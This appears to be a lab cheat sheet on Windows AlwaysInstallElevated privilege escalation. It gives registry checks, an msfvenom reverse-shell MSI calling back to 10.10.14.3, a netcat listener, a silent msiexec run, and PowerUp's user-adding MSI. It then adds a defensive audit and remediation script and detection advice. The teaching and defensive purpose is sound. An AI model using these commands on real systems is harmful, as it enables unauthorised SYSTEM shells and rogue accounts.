
always-installed-elevated

Enumerate the AlwaysInstallElevated settings

reg query HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Installer
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer

If the AlwaysInstallElevated value reads 0x1 (REG_DWORD) in both keys, the policy is enabled and we can continue (exploit).

Exploit (only if the policy is enabled)

Generate an MSI package

msfvenom -p windows/shell_reverse_tcp lhost=10.10.14.3 lport=9443 -f msi > aie.msi 

Start a listener, then execute the MSI package on the target

nc -lnvp 9443
msiexec /i c:\users\htb-student\desktop\aie.msi /quiet /qn /norestart

Escalating privileges with PowerUp (after gaining a shell)

Check the registry values, then use PowerUp's Write-UserAddMSI to generate an MSI that adds a user

reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated
Import-Module .\PowerUp.ps1
Write-UserAddMSI
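The same two registry values, checked from the defender's side. The following PowerShell audit script is an added example and is not part of the original page or of PowerUp; it reads the HKLM and HKCU values queried above, reports whether the policy is actually effective (it only applies when both values are 1), and with the assumed `-Remediate` switch sets both to 0.

```powershell
# Added example (not from the original page): audit AlwaysInstallElevated on a host.
# Reports whether the policy is effective (both HKLM and HKCU values set to 1) and,
# with -Remediate, disables it. Key paths and value name are the ones queried above.

param(
    [switch]$Remediate
)

$ValueName = 'AlwaysInstallElevated'
$Keys = @(
    'HKLM:\SOFTWARE\Policies\Microsoft\Windows\Installer',
    'HKCU:\SOFTWARE\Policies\Microsoft\Windows\Installer'
)

function Get-AieState {
    param([string]$Path)
    # A missing key or a missing value both mean "policy not configured"
    if (-not (Test-Path -Path $Path)) { return $null }
    $item = Get-ItemProperty -Path $Path -Name $ValueName -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return [int]$item.$ValueName
}

$results = foreach ($k in $Keys) {
    [pscustomobject]@{
        Key   = $k
        Value = Get-AieState -Path $k
    }
}

$results | Format-Table -AutoSize

# The policy only takes effect when both the machine and the user value are 1.
$effective = @($results | Where-Object { $_.Value -eq 1 }).Count -eq $Keys.Count

if ($effective) {
    Write-Warning "AlwaysInstallElevated is effective: any user can install an MSI as SYSTEM."
    if ($Remediate) {
        foreach ($k in $Keys) {
            Set-ItemProperty -Path $k -Name $ValueName -Value 0 -Type DWord
            Write-Host "Set $k\$ValueName = 0"
        }
    }
} else {
    Write-Host "AlwaysInstallElevated is not effective on this host."
}
```

Run it as `.\Check-AIE.ps1` to audit, or `.\Check-AIE.ps1 -Remediate` from an elevated prompt to clear both values. On a domain-joined host the durable fix is to set "Always install with elevated privileges" to Disabled in both the Computer and User halves of Group Policy, otherwise the next policy refresh may restore the value. For detection, MsiInstaller events in the Application log (for example 1033 and 11707) record which user installed which package, which makes an unexpected MSI install by an unprivileged account easy to spot.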
